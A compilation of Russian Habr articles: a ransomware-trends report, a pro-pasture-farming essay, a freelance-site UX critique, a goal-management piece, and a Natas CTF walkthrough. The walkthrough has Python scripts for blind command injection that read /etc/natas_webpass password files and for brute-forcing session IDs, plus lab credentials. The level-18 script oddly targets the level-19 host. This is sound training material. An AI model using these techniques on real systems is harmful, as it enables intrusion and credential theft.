Живы и здравствуют: вирусы-вымогатели в 2019 году

image

Вирусы-вымогатели, как и другие виды вредоносного ПО, с годами эволюционируют и видоизменяются — от простых локеров, которые не давали пользователю войти в систему, и «полицейских» вымогателей, пугавших судебным преследованием за выдуманные нарушения закона мы пришли к программам-шифровальщикам. Эти зловреды шифруют файлы на жёстких дисках (или диски целиком) и требуют выкуп не за возврат доступа к системе, а за то, что информация пользователя не будет удалена, продана в даркнете или выставлена на всеобщее обозрение в сети. Причём выплата выкупа совершенно не гарантирует получение ключа для расшифровки файлов. И нет, это «сто лет назад уже было», а по-прежнему актуальная угроза.

Учитывая успешность хакеров и доходность этого типа атак, специалисты считают, что в будущем их частота и изобретательность будет только расти. По данным Cybersecurity Ventures, в 2016 году вирусы-вымогатели атаковали компании примерно раз в 40 секунд, в 2019 это происходит раз в 14 секунд, а в 2021 году частота увеличится до одной атаки в 11 секунд. При этом стоит отметить, что требуемый выкуп (особенно, в целевых атаках на крупные компании или городскую инфраструктуру) как правило оказывается во много раз ниже, чем ущерб, наносимый атакой. Так, майская атака на правительственные структуры Балтимора, штат Мэриленд, в США, нанесла ущерб на сумму более 18 млн долларов, при заявленной хакерами сумме выкупа в 76 тыс. долларов в биткоиновом эквиваленте. А атака на администрацию Атланты, штат Джорджия, в августе 2018 года обошлась городу в 17 млн долларов США при требуемом выкупе в 52 тыс. долларов.

Специалисты Trend Micro проанализировали атаки с применением вирусов-вымогателей за первые месяцы 2019 года, и в этой статье мы расскажем о главных трендах, которые ожидают мир во второй его половине.

Вирус-вымогатель: краткое досье

Смысл вируса-вымогателя ясен из самого его названии: угрожая уничтожить (или, наоборот, опубликовать) конфиденциальную или ценную для пользователя информацию, хакеры с его помощью требуют выкуп за возврат доступа к ней. Для простых пользователей такая атака неприятна, но не критична: угроза потери музыкальной коллекции или фотографий из отпусков за последние десять лет не гарантирует выплату выкупа.

Совершенно по-другому выглядит ситуация для организаций. Каждая минута простоя бизнеса стоит денег, поэтому потеря доступа к системе, приложениям или данным для современной компании равна убыткам. Именно поэтому фокус атак вирусов-вымогателей в последние годы постепенно смещается от артобстрела вирусами к снижению активности и переходу к целевым рейдам на организации в сферах деятельности, в которых шанс получения выкупа и его размеры максимально велики. В свою очередь организации стремятся защититься от угроз по двум основным направлениям: разрабатывая способы эффективно восстанавливать инфраструктуру и базы данных после атак, а также принимая на вооружение более современные системы киберзащиты, которые обнаруживают и своевременно уничтожают вредоносное ПО.

Чтобы оставаться в курсе событий и вырабатывать новые решения и технологии для борьбы с вредоносным ПО, Trend Micro постоянно анализирует результаты, полученные от своих систем кибербезопасности. ПО данным Trend Micro Smart Protection Network, ситуация с атаками вирусов-вымогателей за последние годы выглядит так:

image

Выбор жертвы в 2019 году

В этом году киберпреступники явно стали относиться к выбору жертв намного более тщательно: их целью становятся организации, которые защищены хуже и при этом готовы заплатить большую сумму за быстрое восстановление нормальной деятельности. Именно поэтому с начала года зафиксировано уже несколько атак на правительственные структуры и администрацию крупных городов, включая Лейк-Сити (выкуп — 530 тыс. долларов США) и Ривьера-Бич (выкуп — 600 тыс. долларов США) в штате Флорида, США.

В разбивке по отраслям основные векторы атак выглядят так:

— 27% — правительственные структуры;
— 20% — производство;
— 14% — здравоохранение;
— 6% — розничная торговля;
— 5% — образование.

Часто киберпреступники используют метод OSINT (поиск и сбор информации из общедоступных источников), чтобы подготовиться к атаке и оценить её прибыльность. Собирая информацию, они лучше понимают бизнес-модель организации и репутационные риски, которые она может понести из-за атаки. Также хакеры ищут наиболее важные системы и подсистемы, которые можно полностью изолировать или отключить при помощи вирусов-вымогателей, — это повышает шанс на получение выкупа. Не в последнюю очередь оценивается состояние систем кибербезопасности: нет смысла начинать атаку на компанию, ИТ-специалисты которой способны с высокой вероятностью её отразить.

Во второй половине 2019 года этот тренд будет всё так же актуален. Хакеры будут находить новые сферы деятельности, в которых нарушение бизнес-процессов приводит к максимальным убыткам (например, транспорт, важные объекты инфраструктуры, энергетика).

Методы проникновения и заражения

В этой сфере также постоянно происходят изменения. Самыми популярными инструментами остаются фишинг, вредоносные рекламные объявления на сайтах и заражённые интернет-страницы, а также эксплойты. При этом главным «соучастником» атак всё так же выступает пользователь-сотрудник, который открывает эти сайты и загружает файлы по ссылкам или из электронной почты, что и провоцирует дальнейшее заражение всей сети организации.

Однако во второй половине 2019 года к этим инструментам добавятся:

  • более активное применение атак с использованием социальной инженерии (атака, при которых жертва добровольно совершает нужные хакеру действия или выдаёт информацию, считая, например, что общается с представителем руководства или клиента организации), которые упрощает сбор информации о сотрудниках из общедоступных источников;
  • использование похищенных учётных данных, например, логинов и паролей от систем удалённого администрирования, которые можно приобрести в даркнете;
  • физический взлом и проникновение, которые позволят хакерам на месте обнаружить критически важные системы и обезвредить систему безопасности.

Методы сокрытия атак

Благодаря развитию систем кибербезопасности, вклад в которое вносит и Trend Micro, обнаружение классических семейств вирусов-вымогателей в последнее время значительно упростилось. Технологии машинного обучения и поведенческого анализа помогают выявлять вредоносное ПО ещё до его проникновения в систему, поэтому хакерам приходится придумывать альтернативные способы для сокрытия атак.

Уже известные специалистам в сфере ИТ-безопасности и новые технологии киберпреступников нацелены на обезвреживание «песочниц» для анализа подозрительных файлов и систем машинного обучения, разработку бесфайлового вредоносного ПО и использование заражённого лицензионного программного обеспечения, включая ПО от вендоров в сфере кибербезопасности и различные удалённые службы с доступом к сети организации.

Выводы и рекомендации

В целом можно сказать, что во второй половине 2019 года высока вероятность целевых атак на крупные организации, которые способны выплатить киберпреступникам большой выкуп. При этом хакеры не всегда разрабатывают решения для взлома и вредоносное ПО самостоятельно. Часть из них, например, печально известная команда GandCrab, которая уже прекратила свою деятельность, заработав около 150 млн долларов США, продолжают работать по схеме RaaS (ransomware-as-a-service, или«вирусы-вымогатели как сервис», по аналогии с антивирусами и системами киберзащиты). То есть распространением успешных вымогателей и криптолокеров в этом году занимаются не только их создатели, но и «арендаторы».

В таких условиях организациям необходимо постоянно обновлять свои системы кибербезопасности и схемы восстановления данных на случай атаки, ведь единственный эффективный способ борьбы с вирусами-вымогателями — не платить выкуп и лишить их авторов источника прибыли.


ссылка на оригинал статьи https://habr.com/ru/company/trendmicro/blog/464709/

Если вы хотите спасти мир, веганство — это не выход

Если вы ещё не читали мой резонансный пост «Почему быть вегетарианцем на самом деле невозможно», то пожалуйста сделайте это перед прочтением данного поста.

За последние несколько лет веганство набрало популярность в Великобритании — предположительно полумиллиона человек в 2016 году и более чем 3,5 млн — 5% нашего населения — сегодня являются веганами. Документальные фильмы, такие как «Cowspiracy» и « What the Health», привлекли внимание к мясной и молочной промышленности, разоблачая воздействие на здоровье животных, человека и окружающую среду в целом.

image

Вместо того, чтобы соблазняться призывами есть больше продуктов, произведенных из промышленно выращенной сои, кукурузы и зерна, мы должны поощрять устойчивые формы производства мяса и молочных продуктов, основанных на традиционных системах ротации, постоянных пастбищах и сохранения пастбищ. Мы должны, по крайней мере, поставить под сомнение этику повышения спроса на сельскохозяйственные культуры, которые требуют большого количества удобрений, фунгицидов, пестицидов и гербицидов, одновременно демонстрируя устойчивые формы животноводства, которые могут восстанавливать почвы и биоразнообразие, а также улавливать углерод.

В 2000 году мы с мужем перевели нашу ферму площадью 1400 гектаров (3500 акров) в Западном Сассексе на обширные пастбища с использованием свободно кочующих стад староанглийского длиннорогого скота, свиней Тамуорта, пони Эксмура, и т.д., в рамках проекта по ревайлдингу. В течение 17 лет мы боролись за то, чтобы сделать наш традиционный пахотный и молочный бизнес прибыльным, но на тяжелой низкой глине мы никогда не могли конкурировать с фермами на более легких почвах. Это решение перевернуло нашу судьбу. Сейчас эко-туризм, аренда бывших сельскохозяйственных зданий, а также 75 тонн в год органического пастбищного мяса вносят вклад в прибыльный бизнес. А поскольку животные живут на улице круглый год и у них есть много еды, они не нуждаются в дополнительном питании и редко нуждаются в посещении ветеринара.

Животные живут в стадах и гуляют там, где пожелают. Они отдыхают там, где им нравится (они «презирают» открытые сараи, оставленные для них в качестве укрытия) и едят то, что им нравится. Крупный рогатый скот и олени пасутся среди полевых цветов и луга, но они также бродят среди кустарников и деревьев. Свиньи приживаются к корневищам и даже ныряют за лебедями в пруды. То, как они пасутся, по-разному стимулирует растительность, что, в свою очередь, создает возможности для других видов, включая мелких млекопитающих и птиц.

image

Важно отметить, что поскольку мы не используем авермектины (противоглистные вещества, которыми обычно кормят скот в интенсивных системах) или антибиотики, их навоз служит питанием для дождевых червей, бактерий, грибков и беспозвоночных, таких как навозные жуки. Это жизненно важный процесс восстановления экосистемы, возвращения питательных веществ и структуры в почву. Потеря почвы является одной из величайших катастроф, с которыми сегодня сталкивается мир. В отчете ООН по продовольствию и сельскому хозяйству за 2015 год говорится, что в глобальном масштабе от 25 до 40 миллиардов тонн верхнего слоя почвы ежегодно теряется из-за эрозии, главным образом из-за вспашки и интенсивного посева.

В Великобритании истощение верхнего слоя почвы настолько велико, что в 2014 году отраслевой журнал Farmers Weekly объявил, что у нас может остаться только 100 урожаев. Оставить пахотную землю под паром и вернуть ее на пастбище на определенный период — как раньше делали фермеры, до того, как искусственные удобрения и механизация делали возможным непрерывное возделывание — является единственным способом обратить вспять этот процесс, остановить эрозию и восстановить почву, согласно ООН Food и сельскохозяйственная организация. Выпас скота не только обеспечивает фермеров доходом, но навоз животных, моча и даже способ выпаса скота ускоряют восстановление почвы. Ключ должен быть органическим, и держать скот на низком уровне, чтобы предотвратить чрезмерный выпас скота.

Двадцать лет назад наши почвы на ферме — сильно деградировавшие после десятилетий вспашки и химических выбросов — были почти биологически мертвыми. Теперь у нас есть плодоносящие грибы и орхидеи, появляющиеся на наших бывших пахотных полях: признак того, что распространяются подземные сети микоризных грибов. У нас есть 19 видов дождевых червей — ключевых видов, ответственных за аэрацию, вращение, внесение удобрений, увлажнение и даже детоксикацию почвы. Мы нашли 23 вида навозных жуков в одной корове, одного из которых — фиолетового жука — не видели в Сассексе в течение 50 лет. Птицы, которые питаются насекомыми, привлеченными этим питательным навозом, взлетают. Укоренение свиней дает возможность для прорастания местной флоры и кустарников, в том числе и ивы, и это привело к появлению самой большой колонии фиолетовых императоров в Британии, одного из нашего самого редкого вида бабочек, которые откладывает яйца на листьях ивы.

Эта система естественного выпаса не только помогает окружающей среде с точки зрения восстановления почвы, биоразнообразия, опыления насекомых, качества воды и смягчения последствий наводнений, но также гарантирует здоровую жизнь животных, а они, в свою очередь, производят мясо, которое полезно для нас. В отличие от мяса с зерновыми и готовыми зернами из интенсивных систем, мясо на пастбищных угодьях богато бета-каротином, кальцием, селеном, магнием и калием, а также витаминами E и B, и конъюгированной линолевой кислотой (CLA) — мощным анти-канцерогеном. Он также содержит большое количество длинноцепочечной омега-3 жирной кислоты DHA, которая жизненно важна для развития человеческого мозга, но которую очень сложно получить веганам.

Многое было сделано в отношении выбросов метана скотом, но они ниже в системах пастбищ с биоразнообразием, которые включают дикие растения, такие как дягиля, обыкновенный фумиорий, пастушья сумка и трилистник из птичьих лап, потому что они содержат фумаровую кислоту — соединение, которое при добавлении в рацион ягнят в Институте Роветта в Абердине снизил выбросы метана на 70%.

В уравнении вегана, напротив, стоимость углерода вспашки редко учитывается. Со времени промышленной революции, согласно докладу 2017 года в научном журнале Nature, до 70% углерода в наших культивируемых почвах теряется в атмосферу.

Таким образом, здесь огромная ответственность: если вы не производите свои веганские продукты специально из органических систем «без вспашки», вы активно участвуете в уничтожении почвенной биоты, продвигая систему, которая лишает других видов, в том числе мелких млекопитающих, птиц и рептилии, условий жизни и значительного вклада в изменение климата.

Наша экология развивалась вместе с крупными травоядными животными — со свободно бродячими стадами зубров (предками коров), тарпанов (оригинальная лошадь), лося, медведя, бизона, благородного оленя, косули, дикого кабана и миллионами бобров. Это виды, чьи взаимодействия с окружающей средой поддерживают и способствуют жизни. Использование травоядных животных в качестве части сельскохозяйственного цикла может иметь большое значение для обеспечения устойчивости сельского хозяйства.

Нет никаких сомнений в том, что мы все должны есть гораздо меньше мяса, и призываем положить конец высокоуглеродистым, неэтичным, интенсивным формам производства мяса на зерновых, которые заслуживают похвалы. Но если вы как вегетарианец заботитесь об окружающей среде, благосостоянии животных и собственном здоровье, то больше нельзя делать вид, что все это решается просто отказом от мяса и молочных продуктов. Может показаться нелогичным, что добавление в вашу диету изредка органического стейка с пастбищами может быть правильным способом выстроить круг.


ссылка на оригинал статьи https://habr.com/ru/post/464687/

Вахтёры фриланса

Люди, проектировавшие настройки специализаций для фрилансеров на других ресурсах, явно имеют какое-то своё представление о реальности, в которой каждый фрилансер — это робот, с пелёнок запрограммированный на выполнение конкретного типа работ в строго определённом круге задач по принципу «Умеешь считать? Будешь бухгалтером». И эти люди не шутят в своём стремлении навязать свои представления самой реальности. Простой пример: на fl.ru больше двухсот специализаций, разбитых на 20 категорий — из них фрилансеру бесплатно доступна одна (!), а при покупке Pro-аккаунта, который стоит от полутора тысяч рублей в месяц — целых пять.



Пять из более, чем двухсот специализаций. Приобретение аккаунта Pro по некоторым из которых стоит более двух с половиной тысяч рублей в месяц. За пять специализаций из двухсот.

Такое ощущение, что разработчики fl.ru людей, которые в состоянии делать больше пяти вещей, в своей жизни никогда не встречали. Проходят годы, домены становятся короче, а фриланс.ру остаётся фрилансом.ру.

На kwork.ru нет как таковой специализации профиля пользователя, но есть биржа проектов, рассортированных по 69 рубрикам, из которых фрилансер может выбрать любые семь.

Почему именно семь? Почему не шесть? Почему не восемь? Почему не шестьдесят восемь? Откуда и зачем это ограничение в семь рубрик, которые фрилансер может выбрать, кастомизируя ленту проектов под свои нужды? Возможно, в «Кворке» работают крайне суеверные люди, которые верят, что число семь приносит удачу? И это ещё самое логичное из всех возможных объяснений, которые пришли мне на ум.

Разумеется, вопросы это риторические и ответ на них мне прекрасно известен — просто он не из области юзабилити, а из области психологии: синдром вахтёра.

Он особенно часто и ярко проявляется у компаний, бизнес-модель которых построена на freemium-модели с ограниченным набором бесплатных услуг и полным функционалом, спрятанным за paywall — просто иногда такие сервисы, даже взяв с пользователя деньги за доступ, про вторую половину сделки — полноту функционала — почему-то забывают.

Это потрясающе, как глубоко в людях может засесть синдром «держать и не пущать», если и ослабляя хватку, то по чуть-чуть и за деньги, что даже в такой, как принято считать, прогрессивной области, как интернет-индустрия, его проявления могут оставаться незамеченными на самом виду столь долгое время.

Впрочем, проблемы с кастомизацией встречаются не только в виде ограниченного, но и навязанного выбора, как в случае с workspace.ru, который позволяет как настроить специализации в профиле фрилансера, как на fl.ru, так и кастомизировать ленту проектов, как на kwork.ru — но, в отличие от них обоих, без каких-либо ограничений выбора из десятков доступных вариантов. So far so good.

По отдельности возможность как выбрать неограниченное число специализаций, так и указать примерную стоимость своей работы в почасовом или попроектном выражении — это замечательные возможности.

Но если их совместить, то шведский стол оборачивается мышеловкой: у каждой выбранной специализации фрилансеру нужно указать ориентировочный бюджет проекта и/или стоимость часа своей работы индивидуально, что удваивает и даже утраивает общее количество требуемых от пользователей действий, добавляя к выбору нужных чекбоксов заполнение сопуствующих полей.

Насколько это необходимо?

Очень похоже на то, что логика заполнения информации о специализации фрилансера «переехала» с тендерной площадки workspace.ru/b2b.

Но там совсем другая специфика: на тендерной площадке корпоративные и индивидуальные заказчики ищут подбирают на подряд команды, состав которых и количество необходимых ресурсов может значительно варьироваться в зависимости от специфики задачи; тогда как на фриланс-сайтах ищутся индивидуальные подрядчики, у которых, в большинстве случаев, стоимость часа будет постоянной, а переменной величиной будет только стоимость выполнения проекта в зависимости от его ресурсоёмкости.

Впрочем, это всё равно намного, намного лучше, чем ограничение на количество возможных специализаций, уже многие годы являющееся, почему-то, стандартом среди подобных сервисов в рунете. И фиксится, к слову, элементарно: нужно только вынести стоимость часа работы и минимального объёма заказа в дефолтные настройки, оставив соответствующие поля в описании выбранных специализаций только как возможность кастомизации — сократив, тем самым, в разы объём необходимой работы по заполнению профиля фрилансером.

Впрочем, проблемы с ограничениями на «Кворке» и fl.ru пофиксить с технической точки зрения тоже несложно — вопрос исключительно в желании сервиса пойти навстречу людям, которые его кормят.


ссылка на оригинал статьи https://habr.com/ru/post/464717/

Управление целями в организации: Цели и инженеры (часть 3)


Продолжаем цикл публикаций о Pulse Management — Управление проектной организацией (Метод Пульса). Мы уже разобрались с моделью организации, с основными принципами Метода. Теперь время рассказать о Правилах. Правила программируют организацию, а значит они должны быть определены. Метод определяет Правила исходя из предпосылок среды, если у вас ситуация схожая, то вы можете применять эти правила, иначе — адаптируйте под свою среду.

Первые основные правила: Правила Целей. Инженеры такие люди, которые могут достичь любую цель, однако если им цель не поставят, то они будут достигать свою цель. И она может не совсем соответствовать целям организации.

Управление целями

Цель в организации — это такая сущность, которую кому-то «надо достигнуть» и на её достижение тратятся время и ресурсы. Кроме целей существуют«Инициативы» или «Идеи» они отличаются от «Целей» тем, что они находятся в категории «желательно достигнуть». Обычно, если «желательно» — это значит что решения о финансировании достижения такой цели еще не принято, и в карте развития организации такая Инициатива может стоят совсем не на первом месте.

Принципы существования целей

  1. Мысль материальна. Чем более высокооплачиваемое лицо озвучивает мысль, тем выше вероятность, что озвученная мысль станет целью для сотрудников.
  2. Творческие люди склонны придумывать себе задачи интересней. Задача в общем виде решается проще, и для инженера самое интересное, это найти “общий вид”.
  3. Та работа, которая была придумана самостоятельно становится целью и выполняется охотнее.
  4. Мы никогда не знаем, сколько целей в организации.
  5. Не зафиксированная на бумаге (в документе) мысль тратит энергию на удержание её в голове.
  6. Множество Целей в организации приводят к многозадачности на уровне инженеров.

Правила управления целями

Исходя из принципов существования целей необходимо применять следующие правила управления целями:

  1. Договариваться о правилах запуска Инициативы в работу.
  2. Если Инициатива не утверждена, как цель к исполнению или в работе уже находятся другие Цели, то инженер обязан отказаться брать Инициативу в работу. (Однако бывают менеджеры с даром убеждения, поэтому инженеру сложно отказаться если не создать выгодную для него среду, например через систему бонусов)
  3. Договариваться о правилах работы с Инициативами. Делиться идеями руководству с инженерами можно, но должно быть чёткое понимание зачем это делать и какой результат хочется получить в результате озвучивания идеи.
  4. Есть идея – пиши в wiki. Идея будучи записанной, немного потеряет свой блеск, но будет пригодна для обсуждения.
  5. Цель коммерческой организации — создавать ценность для акционеров, клиентов, персонала компании и общества. Это значит, что любую Инициатива необходимо оценивать с точки влияния результата Инициативы на увеличение ценности приносимой организацией.
  6. При запуске Инициативы в работу при незавершённых других Целях стоит помнить, что на предыдущие цели уже потрачены ресурсы и нужно или признать их убытком или довести до конца перед запуском новой Инициативы.
  7. Озвучив идею и определив цель, дайте возможность инженерам самим придумать маршрут движения к цели. Помогайте им придумывать, задавая вопросы: А что будет если….? А как бы нам учесть ещё и этот фактор…. Что нужно сделать перед этим? Что нам мешает достигнуть цели?

Заключение части

Правила простые, но если вы о них еще не договорись, то вы можете внезапно обнаружить, что инженер «пилит» какой-то фреймворк вместо того, чтобы взять готовый или сделать задачу наиболее простым способом. Или вместо того, чтобы делать проект по которому есть внешние обязательства инженер занят реализацией идеи о которой вслух подумал владелец компании на планёрке.

Расскажите в комментариях ваши случаи появления «скрытых» целей в ваших организациях. Как они появляются у вас?

Продолжение следует.

P.S.: Но, если хочется всё и сразу, то есть методичка «Pulse Management: Управление проектной организацией»


ссылка на оригинал статьи https://habr.com/ru/post/464719/

Natas Web. Прохождение CTF площадки, направленной на эксплуатацию Web-уязвимостей. Часть 3

image

В данной статье мы разберемся с эксплуатацией некоторых WEB-узвимостей на примере прохождения варгейма Natas. Каждый уровень имеет доступ к паролю следующего уровня. Все пароли также хранятся в файлах /etc/natas_webpass/. Например, пароль для natas5 хранится в файле /etc/natas_webpass/natas5 и доступен для чтения только для пользователей natas4 и natas5.

Прошлые части: часть 1 и часть 2.

Организационная информация

Специально для тех, кто хочет узнавать что-то новое и развиваться в любой из сфер информационной и компьютерной безопасности, я буду писать и рассказывать о следующих категориях:

  • PWN;
  • криптография (Crypto);
  • cетевые технологии (Network);
  • реверс (Reverse Engineering);
  • стеганография (Stegano);
  • поиск и эксплуатация WEB-уязвимостей.

Вдобавок к этому я поделюсь своим опытом в компьютерной криминалистике, анализе малвари и прошивок, атаках на беспроводные сети и локальные вычислительные сети, проведении пентестов и написании эксплоитов.

Чтобы вы могли узнавать о новых статьях, программном обеспечении и другой информации, я создал канал в Telegram и группу для обсуждения любых вопросов в области ИиКБ. Также ваши личные просьбы, вопросы, предложения и рекомендации рассмотрю лично и отвечу всем.

Вся информация представлена исключительно в образовательных целях. Автор этого документа не несёт никакой ответственности за любой ущерб, причиненный кому-либо в результате использования знаний и методов, полученных в результате изучения данного документа.

level 16

Судя по исходному коду, все служебные символы фильтруются, а передача «склейки» из двух файлов невозможна, так как строка передается в кавычках.

image

Используя конструкции типа $(cmd) можно контролировать вывод «key».

image

Идея такая:

  1. Если в конструкции grep -i «key» file.txt, key – пустая строка, то будет выводиться весь файл.
  2. Так как в файле с паролем всего одна строка, то мы можем контролировать ее вывод.
  3. За счет передачи регулярного выражения в grep внутри конструкции $(cmd), у нас либо будет выводиться строка с паролем (когда мы угадываем начало пароля) в параметр -i и из фала dictionary.txt не будет выведено ни одной строки, либо вместо строки с паролем будет пустая строка и будет выведен весь файл dictionary.txt.

import httplib import urllib import re import base64  charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" count = 0  headers = {} conn = httplib.HTTPConnection("natas16.natas.labs.overthewire.org") headers["Authorization"] = "Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA=="    count = 0 passwd = "" while count != 32: 	for i in range(len(charset)): 		needle = urllib.quote_plus("$(grep -E ^" + passwd + charset[i] +".* /etc/natas_webpass/natas17)Afr") 		conn.request("GET", "/?needle=" + needle + "&submit=Search", "", headers) 		r1 = conn.getresponse() 		data = r1.read() 		if(data.count("African") == 0): 			passwd += charset[i:i+1] 			print(str(count) + " : " + str(passwd)) 			count += 1 			break 		conn.close() print("Password : " + passwd) 

image

Получили пароль.

level 17

Используем sqlmap по прошлому сценарию (из второй части).

image

image

image

Есть пароль.

level 18

Разберем исходный код.

image

Первым делом идет проверка, выставлены ли в браузере куки.(функция my_session_start()).

image

Так как в задании управлять кроме куки нечем, значит они должны быть выставлены, т. е. функция вернет false и в корневом коде мы пойдем в ветку else. Проверка заполнения полей username и password. Функция session_id() принимает случайное число в диапазоне от 1 до 640 (что очень странно, почему такое ограничение) и создает устанавливает конфигурации для функции session_start().

image

image

Далее проверяется username == «admin». Если мы зашли как админ, то нам об этом сообщают и дают пароль для следующего уровня.

image

Идея решения: для пользоватлей определен диапазон id. Напишем брутфорсер, который будет заходить на страницу c id в диапазоне от 1 до 640.

import requests from requests.auth import HTTPBasicAuth import binascii host = 'http://natas19.natas.labs.overthewire.org/' auth = HTTPBasicAuth('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs') params = {'username':'admin', 'password':'admin'}  for i in range(0, 640): 	print(i) 	phpsessid = binascii.hexlify(str(i)+"-admin") 	cookies={'PHPSESSID':phpsessid} 	r = requests.get(host, params=params, cookies=cookies, auth=auth) 	if('Password' in r.content): 		print(r.content) 		break

image

Получаем пароль при id = 119.

level 19

Так как код один и тот же, то и идея та же. Посмотрим cookie.

image

Сторока в hex кодировке. Раскодируем.

image

Осталось просто изменить код.

import requests from requests.auth import HTTPBasicAuth import binascii host = 'http://natas19.natas.labs.overthewire.org/' auth = HTTPBasicAuth('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs') params = {'username':'admin', 'password':'admin'}  for i in range(0, 640): 	print(i) 	phpsessid = binascii.hexlify(str(i)+"-admin") 	cookies={'PHPSESSID':phpsessid} 	r = requests.get(host, params=params, cookies=cookies, auth=auth) 	if('Password' in r.content): 		print(r.content) 		break

image

Есть пароль.

level 20

После анализа исходного кода можно предположить, что внимания заслуживают 2 функции.

Функция mywrite() записывает данные на каждой строке как ключ_значение. Но ключ выбирается случайно, а значение передается из поля ввода.

image

Функция myread() проходит по всем строками считывает разделенные пробелом данные (ключ и значение).

image

Мы увидим пароль только если в таком файле окажется строка «admin 1». Дело в том, что мы можем обойти логику приложения и записать сколько строк, сколько захотим. Для этого мы должны послать строку вида «Значение0_ПереводСтроки_Ключ1_Значение1 и т.д.»

image

После того как значение запишется в файл, перезагрузим страницу, чтобы оно считалось из файла.

image

Забираем пароль.

level 21

Нам предоставляют две версии сайта. Дело в том, что cookie и session доступны для передачи между разными страницами на одном домене. Изучаем исходный код второго сайта. В сессию устанавливаются все принятые параметры. По аналогии с прошлыми уровнями следует установить admin => 1.

image

Просто добавим новый параметр admin со значением 1, перезагрузим страницу и выставим эти cookie на главную страницу.

image

image

Забираем пароль.

Продолжение следует. Вы можете присоединиться к нам в Telegram.


ссылка на оригинал статьи https://habr.com/ru/post/464729/